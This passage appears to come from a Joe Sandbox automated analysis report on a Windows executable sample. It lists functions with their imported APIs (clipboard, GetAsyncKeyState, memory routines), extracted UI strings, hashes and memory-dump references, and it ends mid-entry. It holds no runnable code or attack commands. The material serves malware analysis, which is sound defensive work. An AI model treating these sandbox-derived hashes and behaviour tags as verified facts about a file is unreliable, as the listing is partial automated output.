WideCharToMultiByte.KERNEL32 ref: 00007FF69DCF97A8
WideCharToMultiByte.KERNEL32 ref: 00007FF69DCF9806
GlobalUnlock.KERNEL32 ref: 00007FF69DCF9814
CloseClipboard.USER32 ref: 00007FF69DCF981A

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: Clipboard$ByteCharCloseGlobalMultiWide$DataLockOpenUnlockfree
String ID:
API String ID: 2227228011-0
Opcode ID: b8cf825c0043cebc233109e34a3553aa44836e70e0f3a35ffd5ab8584595a5eb
Instruction ID: df6efc3cc1f898ff32a273e36be44d994d6acf18e5ba983d0dc71d80af9a21bd
Opcode Fuzzy Hash: b8cf825c0043cebc233109e34a3553aa44836e70e0f3a35ffd5ab8584595a5eb
Instruction Fuzzy Hash: 10316E31A09B41C2EB608F29F90052976A4FB84B94F544275DEDE87754EF3CE446DB04

Function 00007FF69DCDEAF4 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 139windowkeyboardCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32 ref: 00007FF69DCDEAF9
DispatchMessageW.USER32 ref: 00007FF69DCDEB04
PeekMessageW.USER32 ref: 00007FF69DCDEB2F
GetCursorPos.USER32 ref: 00007FF69DCDEB53
GetAsyncKeyState.USER32 ref: 00007FF69DCDEB80

Strings

##Background, xrefs: 00007FF69DCDEC08
?, xrefs: 00007FF69DCDEC7B

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: Message$AsyncCursorDispatchPeekStateTranslate
String ID: ##Background$?
API String ID: 1616596613-2098091685
Opcode ID: b8d1e7d5e33add116c5c716b55cb787a99514aa310461bd0eab7dc4d4ed0196c
Instruction ID: 554ccbb7d86f2a20545902d0d35810996a2f4121216efe79dcb6f0587f580aa0
Opcode Fuzzy Hash: b8d1e7d5e33add116c5c716b55cb787a99514aa310461bd0eab7dc4d4ed0196c
Instruction Fuzzy Hash: 1171C322A18686C5E770CF25D8402BDB774FF94B88F0552B2DACD93665EF2CE449C750

Function 00007FF69DD00890 Relevance: 12.3, APIs: 8, Instructions: 254COMMON

Download Yara Rule

APIs

sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DD00983
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DD009AD
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DD009DC
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DD00A0B
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DD00C08
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DD00C36
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DD00C65
sqrtf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DD00C90

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: sqrtf
String ID:
API String ID: 321154650-0
Opcode ID: d6ca420bdbc43312870783dfaaf2f5885d8e2e0dfa232003c2f7a903dbbc6879
Instruction ID: 35b8a660fa8144c42be5bcdc3bbf57401b17b47d98117b70493f15f74b06ade6
Opcode Fuzzy Hash: d6ca420bdbc43312870783dfaaf2f5885d8e2e0dfa232003c2f7a903dbbc6879
Instruction Fuzzy Hash: 63B17322E28BCC41E223963755821F9E250AFBF3C5F2DEB23F984756B2AF2461D55640

Function 00007FF69DD0E260 Relevance: 11.0, APIs: 1, Strings: 6, Instructions: 544COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF69DD1D2B0: AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00007FF69DCD8FA8), ref: 00007FF69DD1D2C0

Part of subcall function 00007FF69DD1CF50: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0000000100000000,00007FF69DCD2E7C), ref: 00007FF69DD1CF6A

Part of subcall function 00007FF69DD1D244: AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00007FF69DCD8FFA), ref: 00007FF69DD1D254
Part of subcall function 00007FF69DD1D244: ReleaseSRWLockExclusive.KERNEL32(?,?,00000000,00007FF69DCD8FFA), ref: 00007FF69DD1D294

memchr.VCRUNTIME140 ref: 00007FF69DD0E94E

Strings

[ ], xrefs: 00007FF69DD0E84E
%*s%.*s, xrefs: 00007FF69DD0E990
[~], xrefs: 00007FF69DD0E83E
[x], xrefs: 00007FF69DD0E847
f?, xrefs: 00007FF69DD0E792
f?, xrefs: 00007FF69DD0E7DF

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: ExclusiveLock$Acquire$Releasemallocmemchr
String ID: %*s%.*s$[ ]$[x]$[~]$f?$f?
API String ID: 39189341-3851841075
Opcode ID: ba4eec59af03c91fc8b93263035885d6c55483d4595ad1571de8d3ee06724afe
Instruction ID: 3c767ea2fe2d3296687694b99377ab3c32b984d17d3d217fc3ea5f9c060e888c
Opcode Fuzzy Hash: ba4eec59af03c91fc8b93263035885d6c55483d4595ad1571de8d3ee06724afe
Instruction Fuzzy Hash: E6521832A08B8585F721CB36D4452B977A4FF99388F146371DB8C972A1EF38E589CB00

Function 00007FF69DD17C70 Relevance: 10.4, APIs: 2, Strings: 4, Instructions: 1450COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF69DD17E1B

Strings

P, xrefs: 00007FF69DD196BF
hue, xrefs: 00007FF69DD18113
alpha, xrefs: 00007FF69DD181D5
##ColorButton, xrefs: 00007FF69DD1918B, 00007FF69DD191A4

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: memmove
String ID: ##ColorButton$P$alpha$hue
API String ID: 2162964266-3924949270
Opcode ID: c6ab6229cfd8c8d85168a48bd6acd6b626c15bc0721365489076767d47f57043
Instruction ID: 96d0264a6642efffed3935f25703cb02986da9501e3e7926250a019a60c74607
Opcode Fuzzy Hash: c6ab6229cfd8c8d85168a48bd6acd6b626c15bc0721365489076767d47f57043
Instruction Fuzzy Hash: ADF2F833E18B8596E321CB36D4411B9B760FF59788F146775EA8CA36A5EF38E185CB00

Function 00007FF69DD17040 Relevance: 9.7, APIs: 1, Strings: 5, Instructions: 659COMMON

Download Yara Rule

Strings

[popup] OpenPopup("%s" -> 0x%08X), xrefs: 00007FF69DD17781
_COL3F, xrefs: 00007FF69DD17AD9
picker, xrefs: 00007FF69DD1773C, 00007FF69DD17756, 00007FF69DD1777A, 00007FF69DD17887, 00007FF69DD178A0
_COL4F, xrefs: 00007FF69DD17B02
##picker, xrefs: 00007FF69DD17960

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID:
String ID: ##picker$[popup] OpenPopup("%s" -> 0x%08X)$_COL3F$_COL4F$picker
API String ID: 0-2733792156
Opcode ID: 22182ddcd517bfa2aaaceeccf23985cb262d96e7ac05302ef90a0da6347c3a4d
Instruction ID: 4df740d11ef0f965d9c79ad22297b0392ebaae14cfae61b5e5873e55eeb924ad
Opcode Fuzzy Hash: 22182ddcd517bfa2aaaceeccf23985cb262d96e7ac05302ef90a0da6347c3a4d
Instruction Fuzzy Hash: 7E72DF32A08B86D6E725CF26D5412BD77A0FB59748F04A375DB8C972A1EF38E589C700

Function 00007FF69DCE5320 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCE554B
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCE564E
memmove.VCRUNTIME140 ref: 00007FF69DCE5671
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCE5694

Strings

Window, xrefs: 00007FF69DCE5364
Table, xrefs: 00007FF69DCE5406

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: malloc$freememmove
String ID: Table$Window
API String ID: 3044343941-616867329
Opcode ID: 8667158f06e70eeba7fc3919cba9b345e667100d5adaf53ad9eca0c8f4106bb1
Instruction ID: 46c5a58557f65fdd68224c953c13aeaeff2629a6b5d60129ea4e29136d3f6369
Opcode Fuzzy Hash: 8667158f06e70eeba7fc3919cba9b345e667100d5adaf53ad9eca0c8f4106bb1
Instruction Fuzzy Hash: 5CC18276A15B81CAEB24CF24E4802AD73B8FB54744F549276CB8D53764EF38E466D340

Function 00007FF69DCFFC80 Relevance: 7.8, APIs: 6, Instructions: 286COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCFFD08
memset.VCRUNTIME140 ref: 00007FF69DCFFDF6
memset.VCRUNTIME140 ref: 00007FF69DCFFE0F
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCFFE94
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DD000F8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DD0013C

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: freemallocmemset
String ID:
API String ID: 3809226132-0
Opcode ID: 22bc8b132c65eacb2779380cf1ad717794157077756cdf149bbc392bed9adff6
Instruction ID: e3d31d42aced230d6ba4db4ab708adc5ea8d6a7df4d5d87e78ca5c3d2285cd4d
Opcode Fuzzy Hash: 22bc8b132c65eacb2779380cf1ad717794157077756cdf149bbc392bed9adff6
Instruction Fuzzy Hash: 55D18032A09A85C6E7758F2AE0452B9B3A4FF98784F149331DB8953764EF38E546DB00

Function 00007FF69DCD5BD0 Relevance: 6.2, APIs: 4, Instructions: 219keyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF69DCD3650: _Query_perf_frequency.MSVCP140 ref: 00007FF69DCD365D
Part of subcall function 00007FF69DCD3650: _Query_perf_counter.MSVCP140 ref: 00007FF69DCD3666

powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD5D51
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD5D6D
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCD5D8A
GetAsyncKeyState.USER32 ref: 00007FF69DCD5DDE

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: powf$AsyncQuery_perf_counterQuery_perf_frequencyState
String ID:
API String ID: 2084314608-0
Opcode ID: c3ef311e766bf4cfddbece6ba78f5c5dddba1bb6957c82e9bbe0f1b1d4e26db6
Instruction ID: 2dca19b3d12604894a51bd7021e4b889ba743315c298ee5c1500e40f23ab623a
Opcode Fuzzy Hash: c3ef311e766bf4cfddbece6ba78f5c5dddba1bb6957c82e9bbe0f1b1d4e26db6
Instruction Fuzzy Hash: C0B1A521E58A8589F732CF75E4403BD63B4EF5A348F145373D98DA6A65EF3CA0868740

Function 00007FF69DD1DCD0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF69DD1DCFC
GetCurrentThreadId.KERNEL32 ref: 00007FF69DD1DD0A
GetCurrentProcessId.KERNEL32 ref: 00007FF69DD1DD16
QueryPerformanceCounter.KERNEL32 ref: 00007FF69DD1DD26

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 7cb0d5effa3d44b21a8bf66d9394127f991ea29c5300890e090e1cf2c7bea9fc
Instruction ID: a04838e0ea630ba34ddc28960b4af8d3ac937276dc0e9310763b1476039ed047
Opcode Fuzzy Hash: 7cb0d5effa3d44b21a8bf66d9394127f991ea29c5300890e090e1cf2c7bea9fc
Instruction Fuzzy Hash: 32113022B54F058AEB10CF60E9552B833A4FB19758F441E31DAAD86BA4EF7CD1598380

Function 00007FF69DCF5A80 Relevance: 5.6, Strings: 4, Instructions: 597COMMON

Download Yara Rule

Strings

<NULL>, xrefs: 00007FF69DCF5FCC
[nav] NavInitRequest: from move, window "%s", layer=%d, xrefs: 00007FF69DCF5FDA
[nav] NavMoveRequest: clamp NavRectRel for gamepad move, xrefs: 00007FF69DCF616C
[nav] NavMoveRequestForward %d, xrefs: 00007FF69DCF5B22

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID:
String ID: <NULL>$[nav] NavInitRequest: from move, window "%s", layer=%d$[nav] NavMoveRequest: clamp NavRectRel for gamepad move$[nav] NavMoveRequestForward %d
API String ID: 0-586442257
Opcode ID: 1e86e0c2e8f6a7c249bb0d5afaea3a0b92c8c4bb246655ee769c12252b02b711
Instruction ID: 189384f17dd85f97f15c8494e103bf51917e3ae21883e420c746d0224d21df20
Opcode Fuzzy Hash: 1e86e0c2e8f6a7c249bb0d5afaea3a0b92c8c4bb246655ee769c12252b02b711
Instruction Fuzzy Hash: DB621C32D297CAC5E633DA3B81452F57268EF29394F298771EB98721E1EF3574825700

Function 00007FF69DCEC326 Relevance: 5.6, APIs: 3, Instructions: 1846COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da66a6c48438cdbf9ac1ea07bf697faa4b8f2ba4bbfd717e473e6c4fca8e700e
Instruction ID: 5b6c221c2e319c43f81aed458ba01004a51a093e14724cec90c3fe3c2595aabd
Opcode Fuzzy Hash: da66a6c48438cdbf9ac1ea07bf697faa4b8f2ba4bbfd717e473e6c4fca8e700e
Instruction Fuzzy Hash: 70130572A087C5D7E72ACA3682413B9B7B4FF59344F089735DB98A3591EF38B4A18710

Function 00007FF69DCF11F0 Relevance: 4.9, APIs: 1, Strings: 2, Instructions: 375COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF69DCF1707

Part of subcall function 00007FF69DCFAAC0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCFAAF2
Part of subcall function 00007FF69DCFAAC0: memmove.VCRUNTIME140 ref: 00007FF69DCFAB0D
Part of subcall function 00007FF69DCFAAC0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DCFAB2D

Strings

Processed, xrefs: 00007FF69DCF1627
Remaining, xrefs: 00007FF69DCF1633

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: freemallocmemmovememset
String ID: Processed$Remaining
API String ID: 1050734653-3602939160
Opcode ID: ae8af059040b749f839b3a34f9533b956f9dcb40868c172b4773ad3f9a0cb39b
Instruction ID: 19d8f777a633fbf9f4da2eef3b02b82f109b06b3a58d24e246ebcb1196cf4186
Opcode Fuzzy Hash: ae8af059040b749f839b3a34f9533b956f9dcb40868c172b4773ad3f9a0cb39b
Instruction Fuzzy Hash: D4F12273A086C286EB35CF2981003B977B9FB55B88F184275CE8DCB684EF39E4599750

Function 00007FF69DD1D328 Relevance: 4.5, APIs: 3, Instructions: 13COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?,?,00000000,00007FF69DD1D429), ref: 00007FF69DD1D333
UnhandledExceptionFilter.KERNEL32(?,?,00000000,00007FF69DD1D429), ref: 00007FF69DD1D33C
GetCurrentProcess.KERNEL32(?,?,00000000,00007FF69DD1D429), ref: 00007FF69DD1D342

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CurrentProcess
String ID:
API String ID: 1249254920-0
Opcode ID: 5b6a3c17b55125c6775a9b7c63cb7aa094d7a82e23c4fa19ceec3a8ab49f6658
Instruction ID: 9e1c3476ea2d88f25835cedfe22c13ab35a560f2c42f9956238c8a2c091d14cd
Opcode Fuzzy Hash: 5b6a3c17b55125c6775a9b7c63cb7aa094d7a82e23c4fa19ceec3a8ab49f6658
Instruction Fuzzy Hash: FED0C751E08606C6FB6A17716D160361210EB5DB49F042174CB4FC5324FD3C548F8740

Function 00007FF69DCDF640 Relevance: 4.4, APIs: 3, Instructions: 601COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,00007FF69DCDED33), ref: 00007FF69DCDF85B
memmove.VCRUNTIME140(?,?,00007FF69DCDED33), ref: 00007FF69DCDF86E
memset.VCRUNTIME140(?,?,00007FF69DCDED33), ref: 00007FF69DCDFA0D

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: memmove$memset
String ID:
API String ID: 3790616698-0
Opcode ID: 778508e9aa91e4ce399c97c248fabfe0b4cbd273bb200c76b3b24970647e821d
Instruction ID: 6a2a17754708956bc40f517f321011eb88e028e6165ebe3348f15cb7dfabfe31
Opcode Fuzzy Hash: 778508e9aa91e4ce399c97c248fabfe0b4cbd273bb200c76b3b24970647e821d
Instruction Fuzzy Hash: 5C523576604AC58ADB20CF2AD9846ED77B4FB89B88F058226DF4E47B28DF39D545C700

Function 00007FF69DD01680 Relevance: 4.2, APIs: 3, Instructions: 431COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF69DCFF2A0: ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCFF476
Part of subcall function 00007FF69DCFF2A0: ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF69DCFF499

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DD01B4F

Part of subcall function 00007FF69DD00D30: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DD00DEA

Part of subcall function 00007FF69DD00340: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DD00442

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DD01B13
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF69DD01B2E

Memory Dump Source

Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true

Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd

Similarity

API ID: free$ceilfmalloc
String ID:
API String ID: 1608849232-0
